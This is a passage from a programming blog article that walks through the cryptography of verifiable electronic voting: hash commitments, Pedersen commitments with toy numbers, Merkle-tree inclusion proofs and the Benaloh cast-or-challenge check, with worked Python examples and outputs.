<li>If the receipt <strong>doesn&rsquo;t reveal</strong> who they voted for, how does the voter check that their vote went to the right candidate?</li>
</ul>
<p>I recently posted the answer, albeit only in passing: <strong>zero-knowledge proofs</strong> (ZK). The same principle behind truly anonymous cryptocurrencies like Monero and Zcash.</p>
<p>The flow would go like this: the voter picks the candidate on the screen; the machine generates a secret random number, computes <code>ciphertext = Enc(election_public_key, vote; random)</code>, produces a ZK proof that this ciphertext contains a valid vote, and publishes everything to a public Merkle tree. The voter takes home only a serial number. The serial <strong>does not contain the vote</strong>, but it lets you prove the vote exists in the tree and was not tampered with.</p>
<p>Here&rsquo;s what this looks like for programmers, step by step, with real values. And at the end I&rsquo;ll explain why, even working perfectly, this would fix nothing.</p>
<h2>Building block 1: hash as commitment<span class="hx:absolute hx:-mt-20" id="building-block-1-hash-as-commitment"></span>
    <a href="#building-block-1-hash-as-commitment" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The foundation of everything is the hash function. A function like SHA-256 takes any input and produces 32 seemingly random bytes. Three properties matter here:</p>
<ul>
<li><strong>Deterministic:</strong> same input, same output. Always.</li>
<li><strong>One-way:</strong> given the hash, there&rsquo;s no going back to the input.</li>
<li><strong>Avalanche:</strong> flip one bit of the input and the whole hash changes.</li>
</ul>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">hashlib</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">commit</span><span class="p">(</span><span class="n">voto</span><span class="p">,</span> <span class="n">nonce</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;</span><span class="si">{</span><span class="n">voto</span><span class="si">}</span><span class="s2">:</span><span class="si">{</span><span class="n">nonce</span><span class="si">}</span><span class="s2">&#34;</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">commit(&#39;Candidato A&#39;, 987654321) = 337051f1dbc6a8ef412ecc14067c263d6a0dc83dada6939b51d74b6651727b69
</span></span><span class="line"><span class="cl">commit(&#39;Candidato A&#39;, 123456789) = 55512bcd60924abf68d162f1a130023635089974db08ea9cff691e1f209898ab
</span></span><span class="line"><span class="cl">commit(&#39;Candidato B&#39;, 987654321) = faf54e90eb84ba4c0446701c3779a382e48d02847bd2301f3836f673c54f9693</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Look closely. The first and second hashes hide <strong>the same vote</strong> — what changes is the <code>nonce</code>, a random number that acts as &ldquo;wrapping&rdquo;. The first and third share the same nonce, but different votes. The three hashes have no visible resemblance to one another.</p>
<p>This is a <strong>commitment</strong>: I publish the hash today, and tomorrow I can reveal <code>(vote, nonce)</code> and anyone can check the hash matches. I can&rsquo;t change my vote after publishing (the <em>binding</em> property), and nobody can figure out the vote before the reveal (the <em>hiding</em> property).</p>
<p>Except there&rsquo;s a problem for our election: if the voter takes home both the vote and the nonce, they can <strong>show both to the coercer</strong>, who verifies the hash and confirms the vote. The halter is back. We need something better.</p>
<h2>Building block 2: Pedersen commitments — hiding for real<span class="hx:absolute hx:-mt-20" id="building-block-2-pedersen-commitments--hiding-for-real"></span>
    <a href="#building-block-2-pedersen-commitments--hiding-for-real" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The Pedersen commitment solves this with modular arithmetic. I&rsquo;ll use toy numbers so you can check the math by hand; real systems use 2048-bit primes or elliptic curves, but the math is identical.</p>
<p>Take a prime <code>p = 23</code> and two generators <code>g = 4</code> and <code>h = 8</code> (both generate a subgroup of order 11 modulo 23 — check it: <code>4^11 mod 23 = 1</code> and <code>8^11 mod 23 = 1</code>). The commitment to a vote <code>v</code> with nonce <code>n</code> is:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">C = g^v * h^n  (mod p)</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">h</span> <span class="o">=</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">8</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">pedersen</span><span class="p">(</span><span class="n">v</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">v</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="o">%</span> <span class="n">p</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">C(voto=1, n=3)  = 1
</span></span><span class="line"><span class="cl">C(voto=1, n=9)  = 13
</span></span><span class="line"><span class="cl">C(voto=0, n=3)  = 6</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Same vote, different nonces, completely different commitments. Now the part that matters. Pedersen has a property called <strong>perfect hiding</strong>: for any commitment <code>C</code>, there <strong>exists</strong> a nonce that opens <code>C</code> as vote 0, and there <strong>exists</strong> a nonce that opens <code>C</code> as vote 1. With our toy prime we can prove it by brute force:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">C</span> <span class="o">=</span> <span class="mi">1</span>  <span class="c1"># the commitment from above, C(vote=1, n=3)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">11</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">pedersen</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="o">==</span> <span class="n">C</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;C abre como voto=0 com nonce </span><span class="si">{</span><span class="n">n</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">pedersen</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="o">==</span> <span class="n">C</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;C abre como voto=1 com nonce </span><span class="si">{</span><span class="n">n</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">C=1 abre como voto=0 com nonce 0
</span></span><span class="line"><span class="cl">C=1 abre como voto=1 com nonce 3</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Read that again, because this is the heart of the article. The commitment <code>C = 1</code> is consistent with <strong>both stories</strong>. Anyone who sees only <code>C</code> has no way to know which one is true — not by brute force, not with a quantum computer, because both openings exist mathematically. The value <code>C</code> simply does not contain the vote&rsquo;s information.</p>
<p>&ldquo;Hold on,&rdquo; you say, &ldquo;so the voter can change their vote afterwards?&rdquo; No, and that&rsquo;s the other half of the property: the commitment is <strong>computationally binding</strong>. Whoever generated the commitment with <code>(vote=1, n=3)</code> can only reveal the other opening (<code>vote=0, n=0</code>) if they can compute a discrete logarithm — that is, find <code>x</code> such that <code>g^x = h mod p</code>. With <code>p = 23</code> that&rsquo;s trivial; with 2048 bits, it&rsquo;s computationally impossible. To sum up:</p>
<ul>
<li><strong>Outsiders</strong> can&rsquo;t discover the vote (hiding).</li>
<li><strong>Whoever committed</strong> can&rsquo;t change the vote afterwards (binding).</li>
</ul>
<p>And the final detail that kills the halter vote: <strong>the machine generates the nonce, not the voter.</strong> The voter sees their choice on the screen, the machine makes the commitment internally, discards the nonce, and prints only the <code>C</code> — the serial. The voter leaves the booth with no way to open their own commitment, even if they want to.</p>
<p>(One implementation detail I&rsquo;ll simplify from here on: Pedersen hides so well that <strong>nobody</strong> can decrypt it — not even the authorities at tally time. In practice, the machine also publishes an ElGamal ciphertext of the same vote: just as opaque to any outsider, but decryptable by the authorities at the tally, with a ZK proof that both carry the same vote. Our toy Pedersen plays both roles in this article, to keep the math on small numbers.)</p>
<h2>Building block 3: the Merkle tree — a ballot box anyone can audit<span class="hx:absolute hx:-mt-20" id="building-block-3-the-merkle-tree--a-ballot-box-anyone-can-audit"></span>
    <a href="#building-block-3-the-merkle-tree--a-ballot-box-anyone-can-audit" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Where do these commitments live? In a public structure anyone can download and verify: a Merkle tree. If you watched my video on <a href="/2023/11/10/akitando-147-criptografia-na-pratica-certificados-bittorrent-git-bitcoin/">cryptography in practice — certificates, BitTorrent, Git, Bitcoin</a>, you&rsquo;ve seen this structure in action: it&rsquo;s the same one that scales BitTorrent, organizes Git commits, and packs the transactions of a Bitcoin block.</p>
<p>The construction is simple: each leaf is the hash of a vote (one voter&rsquo;s commitment <code>C</code>), and each internal node is the hash of the concatenation of its two children, until a single hash remains at the top: the <strong>root</strong>.</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">H</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">(</span><span class="n">x</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">eleitores</span> <span class="o">=</span> <span class="p">[(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">7</span><span class="p">),</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">10</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">5</span><span class="p">),</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">),</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">4</span><span class="p">)]</span>
</span></span><span class="line"><span class="cl"><span class="n">leaves</span> <span class="o">=</span> <span class="p">[</span><span class="n">H</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s2">:</span><span class="si">{</span><span class="n">pedersen</span><span class="p">(</span><span class="n">v</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="p">(</span><span class="n">v</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">eleitores</span><span class="p">)]</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>With the 8 example votes, the leaves look like this (hashes abbreviated):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">eleitor 0: voto=1 nonce=3  -&gt; C=1  -&gt; folha=ef134f2a180ba05d...
</span></span><span class="line"><span class="cl">eleitor 1: voto=0 nonce=7  -&gt; C=12 -&gt; folha=ce356d2f943ea5af...
</span></span><span class="line"><span class="cl">eleitor 2: voto=1 nonce=2  -&gt; C=3  -&gt; folha=8e0375adfc1f4563...
</span></span><span class="line"><span class="cl">eleitor 3: voto=1 nonce=10 -&gt; C=12 -&gt; folha=df284a49f837c454...
</span></span><span class="line"><span class="cl">eleitor 4: voto=0 nonce=5  -&gt; C=16 -&gt; folha=fd6df9e3530cb74f...
</span></span><span class="line"><span class="cl">eleitor 5: voto=1 nonce=1  -&gt; C=9  -&gt; folha=e0e9d38f9ccb7a41...
</span></span><span class="line"><span class="cl">eleitor 6: voto=0 nonce=8  -&gt; C=4  -&gt; folha=e719f7fde83fafda...
</span></span><span class="line"><span class="cl">eleitor 7: voto=1 nonce=4  -&gt; C=8  -&gt; folha=1393ac80e69a8991...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">RAIZ PUBLICA: 48826b6481b574e37156f85e34d877105bc55073fb5a5b981239572a8e7c4b61</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>(The votes and nonces in the table are shown in the clear only so you can check the math; the public tree holds only the leaves — opaque hashes.)</p>
<p>The root is the &ldquo;summary&rdquo; of the whole election: 32 bytes representing every vote. If <strong>a single bit</strong> of a single vote changes, the root changes completely. The root and the entire tree get published. Any citizen, at home, with open-source code, rebuilds the tree and checks whether the published root matches. That&rsquo;s <strong>universal verifiability</strong>.</p>
<p>Now the individual part. Suppose you&rsquo;re voter 4. Your receipt is the serial — the leaf <code>fd6df9e3530cb74f1f0795b751a43454cab281a431d0558b413e33bba83a4100</code>, which is the hash of your commitment <code>C = 16</code> at position 4 in the tree. To prove it&rsquo;s in the tree, you don&rsquo;t need to download and check all 8 votes — you need only <code>log2(8) = 3</code> hashes, the path of &ldquo;siblings&rdquo; up to the root:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">merkle_verify</span><span class="p">(</span><span class="n">leaf</span><span class="p">,</span> <span class="n">proof</span><span class="p">,</span> <span class="n">root</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">cur</span> <span class="o">=</span> <span class="n">leaf</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">h_</span><span class="p">,</span> <span class="n">side</span> <span class="ow">in</span> <span class="n">proof</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">cur</span> <span class="o">=</span> <span class="n">H</span><span class="p">(</span><span class="n">h_</span> <span class="o">+</span> <span class="n">cur</span><span class="p">)</span> <span class="k">if</span> <span class="n">side</span> <span class="o">==</span> <span class="s2">&#34;esq&#34;</span> <span class="k">else</span> <span class="n">H</span><span class="p">(</span><span class="n">cur</span> <span class="o">+</span> <span class="n">h_</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">cur</span> <span class="o">==</span> <span class="n">root</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">prova do eleitor 4:
</span></span><span class="line"><span class="cl">  (dir) e0e9d38f9ccb7a41...  (irmão: folha do eleitor 5)
</span></span><span class="line"><span class="cl">  (dir) 3149c3bf17d98fbc...  (irmão: nó dos eleitores 6-7)
</span></span><span class="line"><span class="cl">  (esq) 3b902c849a40619b...  (irmão: nó dos eleitores 0-3)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">verificação local: True
</span></span><span class="line"><span class="cl">tentando folha adulterada: False</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>You take your serial, concatenate it with the 3 proof hashes in the right order, hash three times, and check whether you land on the public root. If you do, it&rsquo;s <strong>mathematically impossible</strong> for your vote not to be in the tree — because producing a fake proof would require finding a SHA-256 collision, and nobody on the planet knows how to do that. If someone swaps your vote afterwards, your proof stops working and you hold evidence of the fraud in your hand. In a real election with 150 million votes, the proof would be about 28 hashes — fits on a paper receipt or a QR code.</p>
<p>Notice what just happened: you proved that <strong>a piece of information is in the public tree</strong> and that <strong>nobody messed with it</strong>, carrying home only a 32-byte number that, by itself, says absolutely nothing about the content. That&rsquo;s what people mean by &ldquo;zero knowledge&rdquo; in this context: the verification happens without the knowledge (the vote) ever having to travel.</p>
<h2>Building block 4: the Benaloh challenge — checking the machine on the spot<span class="hx:absolute hx:-mt-20" id="building-block-4-the-benaloh-challenge--checking-the-machine-on-the-spot"></span>
    <a href="#building-block-4-the-benaloh-challenge--checking-the-machine-on-the-spot" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There&rsquo;s one blind spot left. The machine shows &ldquo;vote recorded&rdquo; on the screen and prints your serial <code>C</code>. At home, you confirm that <code>C</code> sits in the tree. All good? Not quite. What if the machine <strong>lied</strong> and committed a different vote? The screen shows the candidate you picked, but under the hood it computed the commitment for another one. You would never notice, because the commitment is opaque by design. That&rsquo;s the hiding property working against you.</p>
<p>The classic fix comes from cryptographer Josh Benaloh, and it goes by <strong>Benaloh challenge</strong> (or <em>cast-or-challenge</em>). The idea: after the machine shows the commitment <code>C</code> on screen, but <strong>before</strong> you confirm, you get two options:</p>
<ul>
<li><strong>Cast</strong>: the vote counts, enters the tree, and the nonce is destroyed forever.</li>
<li><strong>Challenge</strong>: you declare that ballot a <strong>test vote</strong>. The machine must reveal the nonce and the vote it put inside the commitment, and you redo the math on the spot — in an independent app, on your own phone, not on the machine&rsquo;s software:</li>
</ul>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="c1"># the machine showed on screen: C = 1</span>
</span></span><span class="line"><span class="cl"><span class="c1"># you challenged; the machine reveals: vote=1, nonce=3</span>
</span></span><span class="line"><span class="cl"><span class="n">pedersen</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span>   <span class="c1"># True -&gt; the machine committed exactly what you picked</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>If it matches, the machine was honest <strong>on that ballot</strong>. The test ballot is spoiled and never enters the tally — the revealed nonce would make it readable — and you vote again, for real this time.</p>
